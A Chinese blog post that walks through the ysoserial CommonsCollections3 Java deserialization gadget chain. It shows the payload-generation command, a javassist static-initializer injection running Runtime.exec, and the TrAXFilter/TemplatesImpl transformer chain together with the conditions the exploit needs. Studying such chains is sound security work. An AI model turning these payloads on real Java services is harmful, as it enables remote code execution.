Java反序列化利用链分析之CommonsCollections3
0x00 前言
前面 分析了ysoserial的CommonsCollections1,熟悉了一点Java反序列化。本文将继续分析ysoserial的利用,今天的主角是CommonsCollections3.
0x01 环境准备
首先由于override的原因(下一篇将分析该原因),环境使用的是 jdk7u80 , commons-collections:3.1 。利用ysoserial生成payload,并载入调试。
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections3 "open /System/Applications/Calculator.app" > commonscollections3.ser
0x02 基础知识
在分析开始前,先补充一下基础知识
public class StaticBlockTest {
}
public class Cracker {
public static byte[] generate(){
try {
String code = "{java.lang.Runtime.getRuntime().exec("open /System/Applications/Calculator.app");}";
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.get(StaticBlockTest.class.getName());
clazz.setName("demo");
clazz.makeClassInitializer().insertAfter(code);
return clazz.toBytecode();
// ...
}
public static void main(String[] args) {
byte[] clazz = generate();
DefiningClassLoader loader = new DefiningClassLoader();
Class cls = loader.defineClass("demo",clazz);// 从字节数组中恢复类
try {
cls.newInstance(); // 实例化该类时会自动调用静态块内的代码
}
// ...
}
}
通过上面这个例子,我们可以获得的知识点主要为两点:
a. defineClass可以从byte数组中恢复一个Class
b. static initializer在类实例化时将自动执行(静态块内的代码)
Java中动态调用的另一种方式是 defineClass
Java提供了ClassLoader从bytes数组中还原Class的方法,defineClass函数就是完成这一过程的函数。
理论上,如果代码中使用了这种方式,且byte数据的内容可控,我们可以执行任意Java代码。为什么呢?
这里就用到了Java类的另一个特性,static block在类实例化时会自动执行块内的代码。我们可以通过javassist对静态块注入任意代码,该类被恢复并实例化时就会调用注入的代码,后文的利用链主要就是用到了这两个知识点。
0x03 利用链分析
1. 前景回顾
这里选择CommonsCollections3是因为他的前半段触发的利用链跟CommonsCollections1是一样的,所以这里只需要分析后半段命令执行的构造即可。回顾一下前半段利用链
sun.reflect.annotation.AnnotationInvocationHandler.readObject()
-> memberValues.entrySet()
-> AnnotationInvocationHandler.invoke()
-> memberValues.get() => LazyMap.get()
-> factory.transform() => ChainedTransformer.transform()
-> iTransformers[].transform()
CommonsCollections1中ChainedTransformer.transform()会循环调用iTransformers数组里的对象的transform函数。CommonsCollections1用的是InvokerTransformer的transform,因为该函数实现了反射调用任意类的功能。那么除了使用InvokerTransformer还有没有其他的方法?答案当然是肯定的!
2. 新的命令执行利用链
来看一下CommonsCollections3的payloads构造
Object templatesImpl = Gadgets.createTemplatesImpl(command);
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(
new Class[] { Templates.class },
new Object[] { templatesImpl } )};
// 后续类似 省略
ConstantTransformer 上一篇已经说过了,其 transform 会返回构造时的对象,这里就是 TrAXFilter.class 对象。
我们重点来看 InstaniateTransformer 的 transform 函数
简单来看,该函数对输入的input(这里就是TrAXFilter.class)做实例化的操作。这里看起来,其实有点像php中找对应的__constructs,在Java里我们就去找构造函数里做了危险操作的class。
来看一下 TrAXFilter 类的构造函数
这里的 templates 就是上面exp中构造的 templatesImpl .
继续看TransformerImpl的newTransformer函数
org.apache.xalan.internal.xsltc.trax.TemplatesImpl.java:newTransformer:481
继续看 getTransletInstance
再继续 defineTransletClasses
看到这里是不是有点熟悉,没错,这里用到了0x02中的两个基础知识。 defineTransletClasses 还原出类, getTransletInstance 进行实例化。那么我们只需要构造一个合适的 _bytecodes 即可执行任意Java代码。
下面补充一下,在构造exp时需要满足的条件:
1.植入的 templates 为 TransformerImpl 类,从而调用后续的 newTransformer 函数
templates 实例,
_name 不为
null ,
_class 为
null
3.植入的 templates 实例, _bytecodes 不为 null , _tfactory 为 TransformerFactoryImpl 对象
4.植入的 templates._bytecodes 数组,其最终还原的对象父类为 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet
那么怎么才能满足这些条件呢?这里神奇的javassist又要上场啦!
来看一下ysoserial的操作
上面的代码不做省略,我们应该好好学习一下javassist的基本操作,代码可以在 Gadgets.createTemplatesImpl 找到!
这里框了两个框,第一个框是通过javassist注入静态块,静态块的内容就是我们需要执行的命令。第二个框是ysoserail框架自己封装的一个反射工具类,通过这个类我们可以动态的操作 templates 实例的类属性内容。这里主要就是在满足上述的几个条件。
这里有一点可以提一下,该利用链的作者在填充 _bytecodes 时,额外填充了一个无关的类(上图第130行)。这个类主要用于满足 _auxClasses ,让这个 getTransletInstance 函数能正常走完。
经过上面的分析,其实我们可以知道 getTransletInstance 的第408行,对 _class 做实例化时我们想要执行的代码就已经执行了。所以这里额外填充的类其实是可有可无的。
0x04 总结
到这里,整一个CommonsCollections3就分析结束了。
CommonsCollections3主要利用了可控的byte数组从defineClass函数中还原出恶意构造的Class。并且在后续的调用中,这个Class被实例化,从而执行了注入的静态块的代码,实现了任意Java代码执行。
到这篇为止,我们已经知道了两种Java的任意代码执行的构造方式
1.利用可控的反射机制。具体的Class、Method等均可控时,利用反射机制,可以构造出任意的类调用、类函数调用
2.利用可控的defineClass函数的byte数组。构造恶意的Class字节码数组,常于静态块注入恶意代码
正文到此结束
热门推荐
相关文章
近期评论
-
文章和留言都翻到11页了 没有OOM
-
-
朋友,翻页到11页,及以后,会出现OOM,无法访问
-
-
搞个gitee的项目
-
-
版本号是多少,你可以下载哪个代码仓库,jdk选1.8 直接跑就行
-
-
-
Loading...
![[HBLOG]公众号](https://www.liuhaihua.cn/img/qrcode_gzh.jpg)
